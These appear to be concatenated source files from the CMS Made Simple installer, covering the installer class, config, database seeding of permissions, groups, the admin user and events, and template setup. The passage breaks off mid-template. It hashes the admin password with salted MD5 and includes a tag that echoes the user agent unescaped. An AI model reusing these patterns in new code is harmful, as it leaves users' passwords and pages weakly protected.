                    throw new \RuntimeException('Invalid config value for '.$key.' - not a directory, or not writable');
                }
                break;
              case 'nobase':
              case 'nofiles':
              case 'debug':
              case 'timezone':
                // do nothing
              break;
            }
        }
        return $config;
    }

    public function get_config()
    {
        $sess = \__appbase\session::get();
        if( isset($sess['config']) ) {
            // already set once... so you must close and re-open the browser to reset it.
            return $sess['config'];
        }

        // gotta load the config, then store it in the session
        $config = $this->load_config();
        $config = $this->check_config($config);
        $sess['config'] = $config;
        return $config;
    }

    private function set_config_val($key,$val)
    {
        $config            = $this->get_config();
      $config[\trim($key)] = $val;

        $sess = \__appbase\session::get();
        $sess['config'] = $config;
    }


    public function get_orig_error_level() { return $this->_orig_error_level; }

    public function get_orig_tz() { return $this->_orig_tz; }

    public function get_destdir() {
        $config = $this->get_config();
        return $config['dest'];
    }

    public function set_destdir($destdir) {
        $this->set_config_val('dest',$destdir);
    }

    public function has_custom_destdir() {
        $p1 = \realpath((string)\getcwd());
        $p2 = \realpath((string)$this->_custom_destdir);
        return ($p1 !== $p2);
    }

    public function get_archive() { return $this->_archive; }

    public function get_dest_version() { return $this->_dest_version; }

    public function get_dest_name() { return $this->_dest_name; }

    public function get_dest_schema() { return $this->_dest_schema; }

    public function get_phar()
    {
        return \Phar::running();
    }

    public function in_phar() {
        $x = $this->get_phar();
        if( !$x ) return FALSE;
        return TRUE;
    }

    public function get_nls()
    {
        if( \is_array($this->_nls) ) return $this->_nls;

        $archive = $this->get_archive();
        $archive = \str_replace('\\', '/', $archive); // for windows
        if( !\file_exists($archive) ) throw new \Exception(\__appbase\lang('error_noarchive'));

        $phardata = new \PharData($archive);
        $nls = [];
        $found = false;
        $pharprefix = "phar://".$archive;
        foreach( new \RecursiveIteratorIterator($phardata) as $file => $it ) {
            if(FALSE === ($p = \strpos($file, '/lib/nls'))) continue;
            $tmp = \substr($file, $p);
            if( !\__appbase\endswith($tmp,'.php') ) continue;
            $found = true;
            if( \preg_match('/\.nls\.php$/', $tmp) ) {
               $tmpdir = $this->get_tmpdir();
               $fn = "$tmpdir/tmp_" . \basename($file);
               @\copy($file, $fn);
               include($fn);
               \unlink($fn);
            }
        }
        if( !$found ) throw new \RuntimeException(\__appbase\lang('error_nlsnotfound'));
        $this->_nls = $nls;
        return $nls;
    }

    public function get_language_list()
    {
        $this->get_nls();
        return $this->_nls['language'];
    }

    public function get_root_url()
    {
        $prefix = null;
        //if( isset($_SERVER['HTTPS']) && !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) != 'off' ) $prefix = 'https';
        $prefix .= '//'.$_SERVER['HTTP_HOST'];

        // if we are putting files somewhere else, we cannot determine the root url of the site
        // via the $_SERVER variables.
        $b = $this->get_destdir();
        if($b != \getcwd() ) {
            if( \__appbase\startswith($b,$_SERVER['DOCUMENT_ROOT']) ) $b = \substr($b, \strlen($_SERVER['DOCUMENT_ROOT']));
            $b = \str_replace('\\', '/', $b); // for windows
            if( !\__appbase\endswith($prefix,'/') && !\__appbase\startswith($b,'/') ) $prefix .= '/';
            return $prefix.$b;
        }

        $b = \dirname($_SERVER['PHP_SELF']);
        if( $this->in_phar() ) {
            $tmp = \basename($_SERVER['SCRIPT_NAME']);
            if(FALSE !== ($p = \strpos($b, $tmp))) $b = \substr($b, 0, $p);
        }

        $b = \str_replace('\\', '/', $b); // cuz windows blows.
        if( !\__appbase\endswith($prefix,'/') && !\__appbase\startswith($b,'/') ) $prefix .= '/';
        return $prefix.$b;
    }
  
  /**
   * @throws \SmartyException
   * @throws \__appbase\langtools_Exception
   */
  public function run()
    {
        // set the languages we're going to support.
        $list = \__appbase\nls()->get_list();
        foreach( $list as &$one ) $one = \substr($one, 0, -4);
        \__appbase\translator()->set_allowed_languages($list);

        // the default language.
        \__appbase\translator()->set_default_language('en_US');

        // get the language preferred by the user (either in the request, in a cookie, or in the session)
        $lang = \__appbase\translator()->get_selected_language();

        if( !$lang ) $lang = \__appbase\translator()->get_default_language(); // get a preferred language

        // set our selected language...
        \__appbase\translator()->set_selected_language($lang);

        // for every request we're gonna make sure it's not cached.
        //session_cache_limiter('private');

        // and make sure we are in UTF-8
        \header('Content-Type:text/html; charset=UTF-8');

        // and do our stuff.
        try {
            $tmp = 'm' . \substr(\md5(\realpath(\getcwd()) . \session_id()), 0, 8);
            $wizard = \__appbase\wizard::get_instance(__DIR__.'/wizard','\cms_autoinstaller');
            // this sets a custom step variable for each instance
            // which is just one more security measure.
            // nobody can guess an installer URL and jump to a specific step to
            // nuke anything (even though database creds are stored in the session
            // so are all the other parameters.
            $wizard->set_step_var($tmp);
            $res = $wizard->process();
        }
        catch( \Exception $e ) {
            $smarty = \__appbase\smarty();
            $smarty->assign('error',$e->GetMessage());
            $smarty->display('error.tpl');
        }
    }

    public function cleanup()
    {
        if( $this->_custom_tmpdir ) {
            utils::rrmdir($this->_custom_tmpdir);
        }
    }
} // end of class
<?php
die('not implemented');
?>[main]
installer_version = '1.4.3';
min_upgrade_version = '1.12'
archive = 'data/data.tar.gz'
dbtype = 'mysqli'
dbhost = 'localhost'
dbprefix = 'cms_'
install_excludes = '/find-mime$/||/scripts\/.*$/||/\/svn.*/||/\/tests\/.*/||/\/build\/.*/||/\/tmp\/.*/'
<?php
global $admin_user;

status_msg(ilang('install_requireddata'));

$query = 'INSERT INTO '.CMS_DB_PREFIX.'version VALUES (202)';
$db->Execute($query);
verbose_msg(ilang('install_setschemaver'));

//
// site preferences
//
verbose_msg(ilang('install_initsiteprefs'));
cms_siteprefs::set('sitedownmessage','<p>Site is currently down for maintenance</p>');
cms_siteprefs::set('metadata',"<meta name=\"Generator\" content=\"CMS Made Simple - Copyright (C) 2004-" . date('Y') . ". All rights reserved.\" />\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n");
cms_siteprefs::set('global_umask','022');
cms_siteprefs::set('auto_clear_cache_age',60); // cache files for only 60 days by default
cms_siteprefs::set('adminlog_lifetime',3600*24*31); // admin log entries only live for 60 days.
cms_siteprefs::set('allow_browser_cache',1); // allow browser to cache cachable pages
cms_siteprefs::set('browser_cache_expiry',60); // browser can cache pages for 60 minutes.

//
// permissions
//
verbose_msg(ilang('install_initsiteperms'));
$all_perms = array();
$perms = array('Add Pages','Manage Groups','Add Templates','Manage Users','Modify Any Page',
	       'Modify Permissions','Modify Templates','Remove Pages',
	       'Modify Modules','Modify Files','Modify Site Preferences',
	       'Manage Stylesheets','Manage Designs','Modify User-defined Tags','Clear Admin Log',
	       'Modify Events','View Tag Help','Manage All Content','Reorder Content','Manage My Settings',
               'Manage My Account', 'Manage My Bookmarks');
foreach( $perms as $one_perm ) {
  $permission = new CmsPermission();
  $permission->source = 'Core';
  $permission->name = $one_perm;
  $permission->text = $one_perm;
  $permission->save();
  $all_perms[$one_perm] = $permission;
}

//
// initial groups
//
verbose_msg(ilang('install_initsitegroups'));
$admin_group = new Group();
$admin_group->name = 'Admin';
$admin_group->description = 'Members of this group can manage the entire site.';
$admin_group->active = 1;
$admin_group->Save();

$editor_group = new Group();
$editor_group->name = 'Editor';
$editor_group->description = 'Members of this group can manage content';
$editor_group->active = 1;
$editor_group->Save();
$editor_group->GrantPermission('Manage All Content');
$editor_group->GrantPermission('Manage My Account');
$editor_group->GrantPermission('Manage My Settings');
$editor_group->GrantPermission('Manage My Bookmarks');

$designer_group = new Group();
$designer_group->name = 'Designer';
$designer_group->description = 'Members of this group can manage stylesheets, templates, and content';
$designer_group->active = 1;
$designer_group->Save();
$designer_group->GrantPermission('Add Templates');
$designer_group->GrantPermission('Manage Designs');
$designer_group->GrantPermission('Modify Templates');
$designer_group->GrantPermission('Manage Stylesheets');
$designer_group->GrantPermission('Manage All Content');
$designer_group->GrantPermission('Manage My Account');
$designer_group->GrantPermission('Manage My Settings');
$designer_group->GrantPermission('Manage My Bookmarks');
$designer_group->GrantPermission('Modify Files');
$designer_group->GrantPermission('Modify User-defined Tags');

//
// initial user account
//
verbose_msg(ilang('install_initsiteusers'));
$sitemask = cms_siteprefs::get('sitemask');
$admin_user = new User;
$admin_user->username = $adminaccount['username'];
if( isset($adminaccount['emailaddr']) && $adminaccount['emailaddr'] ) $admin_user->email = $adminaccount['emailaddr'];
$admin_user->active = 1;
$admin_user->adminaccess = 1;
$admin_user->password = md5($sitemask.$adminaccount['password']);
$admin_user->Save();
UserOperations::get_instance()->AddMemberGroup($admin_user->id,$admin_group->id);
cms_userprefs::set_for_user($admin_user->id,'wysiwyg','MicroTiny'); // the one, and only user preference we need.

//
// User Tags
//
verbose_msg(ilang('install_initsiteusertags'));
UserTagOperations::get_instance()->SetUserTag('user_agent',
  "//Code to show the users user agent information.
echo \$_SERVER['HTTP_USER_AGENT'];",
  'Code to show the user\'s user agent information');

$txt = <<<EOT
//set start to date your site was published\n\$startCopyRight='2004';\n\n// check if start year is this year\nif(date('Y') == \$startCopyRight){\n// it was, just print this year\n    echo \$startCopyRight;\n}else{\n// it wasnt, print startyear and this year delimited with a dash\n    echo \$startCopyRight.'-'. date('Y');\n}
EOT;
UserTagOperations::get_instance()->SetUserTag('custom_copyright',$txt,'Code to output copyright information');

//
// Events
//
verbose_msg(ilang('install_initevents'));
Events::CreateEvent('Core','LoginPost');
Events::CreateEvent('Core','LogoutPost');
Events::CreateEvent('Core','LoginFailed');
Events::CreateEvent('Core','LostPassword');
Events::CreateEvent('Core','LostPasswordReset');

Events::CreateEvent('Core','AddUserPre');
Events::CreateEvent('Core','AddUserPost');
Events::CreateEvent('Core','EditUserPre');
Events::CreateEvent('Core','EditUserPost');
Events::CreateEvent('Core','DeleteUserPre');
Events::CreateEvent('Core','DeleteUserPost');
Events::CreateEvent('Core','AddGroupPre');
Events::CreateEvent('Core','AddGroupPost');
Events::CreateEvent('Core','EditGroupPre');
Events::CreateEvent('Core','EditGroupPost');
Events::CreateEvent('Core','DeleteGroupPre');
Events::CreateEvent('Core','DeleteGroupPost');

Events::CreateEvent('Core','AddStylesheetPre');
Events::CreateEvent('Core','AddStylesheetPost');
Events::CreateEvent('Core','EditStylesheetPre');
Events::CreateEvent('Core','EditStylesheetPost');
Events::CreateEvent('Core','DeleteStylesheetPre');
Events::CreateEvent('Core','DeleteStylesheetPost');
Events::CreateEvent('Core','AddTemplatePre');
Events::CreateEvent('Core','AddTemplatePost');
Events::CreateEvent('Core','EditTemplatePre');

Events::CreateEvent('Core','EditTemplatePost');
Events::CreateEvent('Core','DeleteTemplatePre');
Events::CreateEvent('Core','DeleteTemplatePost');
Events::CreateEvent('Core','AddTemplateTypePre');
Events::CreateEvent('Core','AddTemplateTypePost');
Events::CreateEvent('Core','EditTemplateTypePre');
Events::CreateEvent('Core','EditTemplateTypePost');
Events::CreateEvent('Core','DeleteTemplateTypePre');
Events::CreateEvent('Core','DeleteTemplateTypePost');
Events::CreateEvent('Core','AddDesignPre');
Events::CreateEvent('Core','AddDesignPost');
Events::CreateEvent('Core','EditDesignPre');
Events::CreateEvent('Core','EditDesignPost');
Events::CreateEvent('Core','DeleteDesignPre');
Events::CreateEvent('Core','DeleteDesignPost');

Events::CreateEvent('Core','TemplatePreCompile');
Events::CreateEvent('Core','TemplatePreFetch');
Events::CreateEvent('Core','TemplatePostCompile');

Events::CreateEvent('Core','ContentEditPre');
Events::CreateEvent('Core','ContentEditPost');
Events::CreateEvent('Core','ContentDeletePre');
Events::CreateEvent('Core','ContentDeletePost');

Events::CreateEvent('Core','AddUserDefinedTagPre');
Events::CreateEvent('Core','AddUserDefinedTagPost');
Events::CreateEvent('Core','EditUserDefinedTagPre');
Events::CreateEvent('Core','EditUserDefinedTagPost');
Events::CreateEvent('Core','DeleteUserDefinedTagPre');
Events::CreateEvent('Core','DeleteUserDefinedTagPost');

Events::CreateEvent('Core','ModuleInstalled');
Events::CreateEvent('Core','ModuleUninstalled');
Events::CreateEvent('Core','ModuleUpgraded');
Events::CreateEvent('Core','ContentPreCompile');
Events::CreateEvent('Core','ContentPostCompile');
Events::CreateEvent('Core','ContentPreRender'); // 2.2
Events::CreateEvent('Core','ContentPostRender');
Events::CreateEvent('Core','SmartyPreCompile');
Events::CreateEvent('Core','SmartyPostCompile');
Events::CreateEvent('Core','ChangeGroupAssignPre');
Events::CreateEvent('Core','ChangeGroupAssignPost');
Events::CreateEvent('Core','StylesheetPreCompile');
Events::CreateEvent('Core','StylesheetPostCompile');
Events::CreateEvent('Core','StylesheetPostRender');

$create_private_dir = function($relative_dir) {
    $app = \__appbase\get_app();
    $destdir = $app->get_destdir();
    $relative_dir = trim($relative_dir);
    if( !$relative_dir ) return;

    $dir = $destdir.'/'.$relative_dir;
    if( !is_dir($dir) ) {
        @mkdir($dir,0777,true);
    }
    @touch($dir.'/index.html');
};

/*
$move_directory_files = function($srcdir,$destdir) {
    $srcdir = trim($srcdir);
    $destdir = trim($destdir);
    if( !is_dir($srcdir) ) return;

    $files = glob($srcdir.'/*');
    if( !count($files) ) return;

    foreach( $files as $src ) {
        $bn = basename($src);
        $dest = $destdir.'/'.$bn;
        rename($src,$dest);
    }
    @touch($dir.'/index.html');
};
*/

// create the assets directory structure
verbose_msg(ilang('install_createassets'));
$create_private_dir('assets/templates');
$create_private_dir('assets/configs');
$create_private_dir('assets/admin_custom');
$create_private_dir('assets/module_custom');
$create_private_dir('assets/plugins');
$create_private_dir('assets/images');
$create_private_dir('assets/css');
<?php

if (isset($CMS_INSTALL_CREATE_TABLES)) {
    $table_ids = array(
        'additional_users'          => array('id' => 'additional_users_id'),
        'admin_bookmarks'           => array('id' => 'bookmark_id'),
        'content'                   => array('id' => 'content_id'),
        'content_props'             => array('id' => 'content_id'),
        'events'                    => array('id' => 'event_id'),
        'event_handlers'            => array('id' => 'handler_id', 'seq' => 'event_handler_seq'),
        'group_perms'               => array('id' => 'group_perm_id'),
        'groups'                    => array('id' => 'group_id'),
        'users'                     => array('id' => 'user_id'),
        'userplugins'               => array('id' => 'userplugin_id'),
        'permissions'               => array('id' => 'permission_id')
    );

    status_msg(ilang('install_update_sequences'));
    foreach ($table_ids as $tablename => $tableinfo)
    {
        $sql = 'SELECT COALESCE(MAX(?),0) AS maxid FROM '.CMS_DB_PREFIX.$tablename;
        $max = $db->GetOne($sql,array($tableinfo['id']));
        $tableinfo['seq'] = isset($tableinfo['seq']) ? $tableinfo['seq'] : $tablename . '_seq';
        verbose_msg(ilang('install_updateseq',$tableinfo['seq']));
        $db->CreateSequence(CMS_DB_PREFIX.$tableinfo['seq'], $max);
    }
}

# vim:ts=4 sw=4 noet
?>
<?php
global $admin_user;

//
// Themes
//

// minimal theme has the minimal template, and no stylesheets.
verbose_msg(ilang('install_default_collections'));

$minimal_theme = new CmsLayoutCollection();
$minimal_theme->set_name('Minimal');  // id = 19
$minimal_theme->set_description('Minimal templates and stylesheets');
$minimal_theme->save();

$simplex_theme = new CmsLayoutCollection();
$simplex_theme->set_name('Simplex');
$simplex_theme->set_description('Simplex Template is a HTML5 based theme, introduced with CMSMS 1.11 release and improved with 2.0 release.
Purpose of this theme is to demonstrate what and how can be done with CMSMS Templates using HTML5 and responsive CSS for a better mobile experience.
All Smarty templates which are used by Simplex Theme are prefix with "Simplex", therefore be careful when renaming or deleting these templates.
Theme itself is using jQuery, which is included with {cms_jquery} tag, the functions JavaScript file is minified, in case you wish to change some JavaScript functions, refer to /uploads/simplex/js/functions.js file and replace functions.min.js file.');
$simplex_theme->set_default(TRUE);
$simplex_theme->save();

$css_menuleft_1col_theme = new CmsLayoutCollection();
$css_menuleft_1col_theme->set_name('CSSMenu left + 1 column');
$css_menuleft_1col_theme->set_description('This is basically the same as the last one, CSSMenu top + 2 column, with the menu on the left instead of across the top there isn\'t a whole lot to say about it.');
$css_menuleft_1col_theme->save();

$css_menutop_2col_theme = new CmsLayoutCollection();
$css_menutop_2col_theme->set_name('CSSMenu top + 2 columns');
$css_menutop_2col_theme->set_description('This is a drop-down menu that is using only CSS (although some Javascript is required for Internet Explorer 6, note: IE6 will not let you use 2 of these menu types in a template at the same time as the second one will fail to open). It can be either vertical or horizontal.');
$css_menutop_2col_theme->save();

$leftsimple_1col_theme = new CmsLayoutCollection();
$leftsimple_1col_theme->set_name('Left simple navigation + 1 column');
$leftsimple_1col_theme->set_description('This template has the menu in left sidebar. The menu is using the Simple Navigation menu template. It is styled in the stylesheet called Navigation Simple - Vertical.');
$leftsimple_1col_theme->save();

$ncleanblue_theme = new CmsLayoutCollection();
$ncleanblue_theme->set_name('NCleanBlue');
$ncleanblue_theme->set_description('This one is using a new menu template so we can style the drop down for the children pages, using an image for the second ul going from the top down, it has an extra li at the bottom of the child pages ul <li class="separator once" style="list-style-type: none;">&nbsp; </li> this is used to hold the bottom image.');
$ncleanblue_theme->save();

$shadowmenu_left_1col_theme = new CmsLayoutCollection();
$shadowmenu_left_1col_theme->set_name('ShadowMenu left + 1 column');
$shadowmenu_left_1col_theme->set_description('Using the same menu template as the previous theme. We changed the child ul CSS to use a different top image. This involves changing some of the margin and padding as the images are a different shape. Note the difference in the second level and third level ul images, one has an arrow up and the other has an arrow left.');
$shadowmenu_left_1col_theme->save();

$shadowmenu_tab_2col_theme = new CmsLayoutCollection();
$shadowmenu_tab_2col_theme->set_name('ShadowMenu Tab + 2 columns');
$shadowmenu_tab_2col_theme->set_description('Using the same menu template as the previous theme. We changed the child ul CSS to use a different top image. This involves changing some of the margin and padding as the images are a different shape. Note the difference in the second level and third level ul images, one has an arrow up and the other has an arrow left.');
$shadowmenu_tab_2col_theme->save();

$topsimple_leftsubnav_1col_theme = new CmsLayoutCollection();
$topsimple_leftsubnav_1col_theme->set_name('Top simple navigation + left subnavigation + 1 column');
$topsimple_leftsubnav_1col_theme->set_description('With the Menu Manager you can easily split the navigation in two parts. On this page the top level in the page hierarchy is displayed horizontally and depending on what page is displayed a localized sub-menu is displayed vertically to the left.');
$topsimple_leftsubnav_1col_theme->save();


//
// Types
//
verbose_msg(ilang('install_templatetypes'));
$page_template_type = new CmsLayoutTemplateType();
$page_template_type->set_originator(CmsLayoutTemplateType::CORE);
$page_template_type->set_name('page');
$page_template_type->set_dflt_flag(TRUE);
$page_template_type->set_lang_callback('CmsTemplateResource::page_type_lang_callback');
$page_template_type->set_content_callback('CmsTemplateResource::reset_page_type_defaults');
$page_template_type->reset_content_to_factory();
$page_template_type->set_content_block_flag(TRUE);
$page_template_type->set_help_callback('CmsTemplateResource::template_help_callback');
$page_template_type->save();

$gcb_template_type = new CmsLayoutTemplateType();
$gcb_template_type->set_originator(CmsLayoutTemplateType::CORE);
$gcb_template_type->set_name('generic');
$gcb_template_type->set_lang_callback('CmsTemplateResource::generic_type_lang_callback');
$gcb_template_type->set_help_callback('CmsTemplateResource::template_help_callback');
$gcb_template_type->save();


//
// Template Categories
//


//
// Templates
//
$template_list = array();

verbose_msg(ilang('install_templates'));
$gcb = new CmsLayoutTemplate();
$gcb->set_name('footer');
$gcb->set_type($gcb_template_type);
$gcb->set_owner(1);
$gcb->set_content("<p>&copy; Copyright {custom_copyright} - CMS Made Simple<br />\r\nThis site is powered by <a class=\"external\" href=\"http://www.cmsmadesimple.org\">CMS Made Simple</a> version {cms_version}</p>");
$gcb->save();

$css_menuleft_1col_theme->add_template($gcb);
$css_menutop_2col_theme->add_template($gcb);
$leftsimple_1col_theme->add_template($gcb);
$ncleanblue_theme->add_template($gcb);
$shadowmenu_left_1col_theme->add_template($gcb);
$shadowmenu_tab_2col_theme->add_template($gcb);
$topsimple_leftsubnav_1col_theme->add_template($gcb);
$template_list[$gcb->get_name()] = $gcb->get_id();

$txt = <<<EOT
{process_pagedata}\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"\n"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n\n<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">\n{* Change lang="en" to the language of your site *}\n\n<head>\n\n<title>{sitename} - {title}</title>\n{* The sitename is changed in Site Admin/Global settings. {title} is the name of each page *}\n\n{metadata}\n{* Don\'t remove this! Metadata is entered in Site Admin/Global settings. *}\n\n{cms_stylesheet}\n{* This is how all the stylesheets attached to this template are linked to *}\n\n</head>\n\n<body>\n\n      {* Start Navigation *}\n      <div style="float: left; width: 25%;">\n         {Navigator loadprops=0 template='minimal_menu'}\n      </div>\n      {* End Navigation *}\n\n      {* Start Content *}\n      <div>\n         <h2>{title}</h2>\n         {content} \n      </div>\n      {* End Content *}\n\n</body>\n</html>
EOT;
$template = new CmsLayoutTemplate();
$template->set_name('Minimal');
$template->set_owner(1);
$template->set_content($txt);
$template->set_description('A Simple, minimal page template');
$template->set_type($page_template_type);
$template->add_design($minimal_theme);
$template->save();
$template_list[$template->get_name()] = $template->get_id();

$txt = <<<EOT
{process_pagedata}<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">\n{* Change lang="en" to the language of your site *}\n\n{* note: anything inside these are smarty comments, they will not show up in the page source *}\n  <head>\n    <title>{sitename} - {title}</title>\n{* The sitename is changed in Site Admin/Global settings. {title} is the name of each page *}\n\n {metadata}\n{* Don't remove this! Metadata is entered in Site Admin/Global settings. *}\n\n {cms_stylesheet}\n{* This is how all the stylesheets attached to this template are linked to it *}\n\n {cms_selflink dir="start" rellink=1}\n {cms_selflink dir="prev" rellink=1}\n {cms_selflink dir="next" rellink=1}\n{* Relational links for interconnections between pages, good for accessibility and Search Engine Optimization *}\n\n{* the literal below and the /literal at the end are needed whenever there are {"curly brackets"} as smarty will think it's something to process and will throw an error *}\n {literal}\n<script type="text/JavaScript">\n<!--\n//pass min and max - measured against window width\nfunction P7_MinMaxW(a,b){\nvar nw="auto",w=document.documentElement.clientWidth;\nif(w>=b){nw=b+"px";}if(w<=a){nw=a+"px";}return nw;\n}\n//-->\n</script>\n    <!--[if lte IE 6]>\n    <style type="text/css">\n    #pagewrapper {width:expression(P7_MinMaxW(720,950));}\n    #container {height: 1%;}\n    </style>\n    <![endif]-->\n    {/literal}\n{* The min and max page width for Internet Explorer is set here. For other browsers it's in the stylesheet "Layout Top menu + 2 columns" *}\n\n    <!--[if lte IE 6]>\n    <script type="text/javascript" src="modules/MenuManager/CSSMenu.js"></script>\n    <![endif]--> \n{* The above JavaScript is required for CSSMenu to work in IE *}\n\n  </head>\n  <body>\n    <div id="pagewrapper">\n{* first out side div/box *}\n\n{* start accessibility skip links, anything with the class of accessibility is hidden with CSS from visual browsers *}\n      <ul class="accessibility">\n        <li>{anchor anchor='menu_vert' title='Skip to navigation' accesskey='n' text='Skip to navigation'}</li>\n        <li>{anchor anchor='main' title='Skip to content' accesskey='s' text='Skip to content'}</li>\n      </ul>\n{* end accessibility skip links *}\n\n      <hr class="accessibility" />\n{* anything class="accessibility" is hidden for visual browsers by CSS *}\n\n{* Start Header, with logo image that links to the default start page. Logo image is changed in the stylesheet  "Layout Left sidebar + 1 column" *}\n      <div id="header">\n\n{* this holds the name of the site on the right side *}\n        <h2 class="headright">{sitename}</h2>\n\n{* a link back to home page and the header left image/logo, text is hidden using CSS *}\n        <h1>{cms_selflink dir="start" text="\$sitename"}</h1>        \n        <hr class="accessibility" />\n      </div>\n{* End Header *}\n\n{* Start Search, the input "Submit" is using an image, CSS: input.search-button *}\n      <div id="search">\n      {Search}\n      </div>\n{* End Search *}\n\n{* Start Breadcrumbs *}\n      <div class="crbk">\n{* holds the right image, we need 2 divs to be able to make this site fluid, if it was fixed width we could use one div, one image  *}\n\n        <div class="breadcrumbs">\n        {nav_breadcrumbs root='Home'}\n          <hr class="accessibility" />\n        </div>\n      </div>\n{* End Breadcrumbs *}\n\n{* Start Content (Navigation and Content columns) *}\n      <div id="content">\n\n{* Start Sidebar, 2 divs one for top image one for bottom image *}\n        <div id="sidebar">\n          <div id="sidebara">\n\n{* Start Navigation, stylesheet  "Navigation CSSMenu - Vertical" *}\n            <h2 class="accessibility">Navigation</h2>\n            {Navigator loadprops=0 template='cssmenu'}\n            <hr class="accessibility" />\n{* End Navigation *}\n\n{* Start News, stylesheet  "Module News" *}\n            <div id="news">\n              <h2>News</h2>\n              {module_available module='News' assign='havenews'}{if \$havenews}EOT{cms_module module=News number='3' detailpage='news'}{/if} {* You cannot use the short form of the module call, i.e: {News} in this type of expression *}\n            </div>\n{* End News *}\n\n          </div>\n        </div>\n{* End Sidebar *}\n\n{* Start Content Area, the back1, back2, back3, hold the 3 outside images, main holds the 4th one, to make the box complete, if the template were fixed width not fluid we could use just 2 divs and 2 images, 1 top 1 bottom *}\n        <div class="back1">\n          <div class="back2">\n            <div class="back3">\n              <div id="main">\n                <h2>{title}</h2>\n                {content}\n                <br />{* to insure space below the content *}\n\n{* Start relational links *}\n{* note this is the right side, when you float: divs you need to have float: right; divs first *}\n            <div class="right49">\n              <p>{anchor anchor='main' text='^ Top'}</p>\n            </div>\n\n            <div class="left49">\n              <p> {cms_selflink dir="previous"}\n{* The label parameter doesn't need to be there if you're using English, but is here to show how it's used if you don't want the English text "Previous page" *}\n              <br />\n              {cms_selflink dir="next"}\n              </p>\n            </div>\n{* End relational links *}\n\n                <hr class="accessibility" />\n                <div class="clear">\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n{* End Content Area *}\n\n      </div>\n{* End Content *}\n\n{* Start Footer. Edit the footer in the Global Content Block called "footer" *}\n      <div class="footback">\n        <div id="footer">\n{* stylesheet  "Navigation FatFootMenu" *}\n          <div id="fooleft">\n          {Navigator loadprops=0}\n          </div>\n          <div id="footrt">\n          {global_content name='footer'}\n          </div>\n          <div class="clear"></div>\n        </div>\n      </div>\n{* End Footer *}\n\n    </div>\n{* end pagewrapper *}\n  </body>\n</html>
EOT;
$template = new CmsLayoutTemplate();
$template->set_name('CSSMenu left + 1 column'); // id = 15
$template->set_owner(1);
$template->set_content($txt);
$template->set_description('This is a drop-down menu that is using only CSS (although some Javascript is required for Internet Explorer 6, note: IE6 will not let you use 2 of these menu types in a template at the same time as the second one will fail to open). It can be either vertical or horizontal.');
$template->set_type($page_template_type);
$template->save();
$css_menuleft_1col_theme->add_template($template);
$template_list[$template->get_name()] = $template->get_id();

$txt = <<<EOT
{process_pagedata}<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">\n{* Change lang="en" to the language of your site *}\n\n{* note: anything inside these are smarty comments, they will not show up in the page source *}\n\n  <head>\n    <title>{sitename} - {title}</title>\n{* The sitename is changed in Site Admin/Global settings. {title} is the name of each page *}\n\n {metadata}\n{* Don't remove this! Metadata is entered in Site Admin/Global settings. *}\n\n {cms_stylesheet}\n{* This is how all the stylesheets attached to this template are linked to it *}\n\n {cms_selflink dir="start" rellink=1}\n {cms_selflink dir="prev" rellink=1}\n {cms_selflink dir="next" rellink=1}\n{* Relational links for interconnections between pages, good for accessibility and Search Engine Optimization *}\n\n{* the literal below and the /literal at the end are needed whenever there are {"curly brackets"} as smarty will think it's something to process and will throw an error *}\n {literal}\n<script type="text/JavaScript">\n<!--\n//pass min and max - measured against window width\nfunction P7_MinMaxW(a,b){\nvar nw="auto",w=document.documentElement.clientWidth;\nif(w>=b){nw=b+"px";}if(w<=a){nw=a+"px";}return nw;\n}\n//-->\n</script>\n    <!--[if lte IE 6]>\n    <style type="text/css">\n    #pagewrapper {width:expression(P7_MinMaxW(720,950));}\n    #container {height: 1%;}\n    </style>\n    <![endif]-->\n    {/literal}\n{* The min and max page width for Internet Explorer is set here. For other browsers it's in the stylesheet "Layout Top menu + 2 columns" *}\n\n    <!--[if lte IE 6]>\n    <script type="text/javascript" src="modules/MenuManager/CSSMenu.js"></script>\n    <![endif]--> \n{* The above JavaScript is required for CSSMenu to work in IE *}\n  </head>\n  <body>\n    <div id="pagewrapper">\n\n{* start accessibility skip links, anything with the class of accessibility is hidden with CSS from visual browsers *}\n      <ul class="accessibility">\n        <li>{anchor anchor='menu_vert' title='Skip to navigation' accesskey='n' text='Skip to navigation'}</li>\n        <li>{anchor anchor='main' title='Skip to content' accesskey='s' text='Skip to content'}</li>\n      </ul>\n{* end accessibility skip links *}\n\n      <hr class="accessibility" />\n{* Horizontal ruler that is hidden for visual browsers by CSS *}\n\n{* Start Header, with logo image that links to the default start page. Logo image is changed in the stylesheet  "Layout Top menu + 2 columns" *}\n      <div id="header">\n\n{* this holds the name of the site on the right side *}\n        <h2 class="headright">{sitename}</h2>\n\n{* a link back to home page and the header left image/logo, text is hidden using CSS *}\n        <h1>{cms_selflink dir="start" text="\$sitename"}</h1>        \n        <hr class="accessibility" />\n      </div>\n{* End Header *}\n\n{* Start Navigation *}\n      <div id="menu_vert">\n{* stylesheet  "Navigation CSSMenu - Horizontal" *}\n        <h2 class="accessibility">Navigation</h2>\n        {Navigator loadprops=0 template='cssmenu'}\n        <hr class="accessibility" />\n      </div>\n{* End Navigation *}\n\n{* Start Search, the input "Submit" is using an image, CSS: input.search-button *}\n      <div id="search">\n      {Search}\n      </div>\n{* End Search *}\n\n{* Start Breadcrumbs *}\n      <div class="crbk">\n{* holds the right image, we need 2 divs to be able to make this site fluid, if it was fixed width we could use one div, one image  *}\n\n        <div class="breadcrumbs">\n        {nav_breadcrumbs root='Home'}\n          <hr class="accessibility" />\n        </div>\n      </div>\n{* End Breadcrumbs *}\n\n{* Start Content *}\n      <div id="content">\n\n{* Start Sidebar *}\n        <div id="sidebar">\n          <div id="sidebarb">\n          {content block='Sidebar'}\n\n{* Start News, stylesheet  "Module News" *}\n            <div id="news">\n              <h2>News</h2>\n              {module_available 